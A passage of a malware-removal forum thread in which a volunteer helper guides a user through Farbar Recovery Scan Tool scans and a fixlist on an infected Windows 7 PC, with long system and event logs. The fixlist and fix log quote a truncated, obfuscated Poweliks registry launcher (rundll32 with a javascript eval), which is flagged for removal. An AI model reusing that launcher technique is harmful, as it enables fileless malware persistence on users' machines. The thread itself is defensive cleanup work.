31-10-2014 09:41:41 Removed Java™ 6 Update 16 (64-bit)
31-10-2014 09:46:03 Removed Java™ 6 Update 33
31-10-2014 10:25:32 Installed Java 7 Update 71
31-10-2014 10:28:23 Removed Java 7 Update 71

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => C:\Windows\system32\bdhpl.dll/s "C:\Windows\system32\bdhpl.dll"
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2014-08-11 11:49 - 2014-08-11 11:49 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x35f0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x25c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x27f8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 08:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2220
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 06:02:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x3534
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/02/2014 03:13:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 02:14:16 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:31 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:30 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 06:25:23 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 06:25:03 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.


Microsoft Office Sessions:
=========================
Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476535f001cff64b5e350963C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlld42ce66d-623e-11e4-bdb2-50e549719966

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf25c801cff64a1ba4cb84C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll89126c6e-623d-11e4-bdb2-50e549719966

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf27f801cff6475c4151c6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc8feb523-623a-11e4-bdb2-50e549719966

Error: (11/01/2014 08:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765222001cff63b2444c0d8C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll95d325fd-622e-11e4-bdb2-50e549719966

Error: (11/01/2014 06:02:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765353401cff627a490641cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll26fe6ea3-621b-11e4-bdb2-50e549719966


==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 62%
Total physical RAM: 3551.17 MB
Available physical RAM: 1346.08 MB
Total Pagefile: 8076.92 MB
Available Pagefile: 3663.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:85.95 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 shelf life

  • Malware Response Team
Posted 02 November 2014 - 04:34 PM

OK, thanks for the info. We will use FRST:

Copy/paste what's below in the quote box into Notepad. Save it as fixlist.txt in the same dir. you have FRST --> C:\Users\Deborah\Downloads

Run FRST64 and this time press the Fix button just once and wait.
The tool will make a log on the desktop (Fixlog.txt); please post it in your reply.

C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll

HKLM-x32\...\Run: [] => [X]

SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File

HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

EmptyTemp:

 

 




#5 dazedandconfused21

  • Topic Starter

Posted 02 November 2014 - 08:07 PM

Here is the result. Also, before I could get this log, the PC rebooted itself.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 17:49:34 Run:1
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll

HKLM-x32\...\Run: [] => [X]

SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File

HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

EmptyTemp:
*****************

C:\Users\Deborah\en_res.dll => Moved successfully.
C:\Users\Deborah\es_res.dll => Moved successfully.
C:\Users\Deborah\fr_res.dll => Moved successfully.
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe => Moved successfully.
C:\Users\Deborah\grm_res.dll => Moved successfully.
C:\Users\Deborah\it_res.dll => Moved successfully.
C:\Users\Deborah\jp_res.dll => Moved successfully.
C:\Users\Deborah\mfc80u.dll => Moved successfully.
C:\Users\Deborah\msvcr80.dll => Moved successfully.
C:\Users\Deborah\PCPE Setup.exe => Moved successfully.
C:\Users\Deborah\pt_res.dll => Moved successfully.
C:\Users\Deborah\ResourceReader.dll => Moved successfully.
C:\Users\Deborah\ru_res.dll => Moved successfully.
C:\Users\Deborah\zh_res.dll => Moved successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key not found.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{95B7759C-8C7F-4BF1-B163-73684A933233} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key not found.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
EmptyTemp: => Removed 6.6 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====



#6 shelf life

  • Malware Response Team

Posted 02 November 2014 - 09:03 PM

Hi,

Ok thanks for the info. Run FRST again like you did before, but before hitting the Scan button put a checkmark next to Addition.txt (under Optional Scan) and then click the Scan button. Please post the new logs, which you can find in the same dir as FRST is in: C:\Users\Deborah\Downloads

 




#7 dazedandconfused21

  • Topic Starter

Posted 02 November 2014 - 10:18 PM

Thank you. Here are the new logs as requested:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 02-11-2014 22:14:52
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
() C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
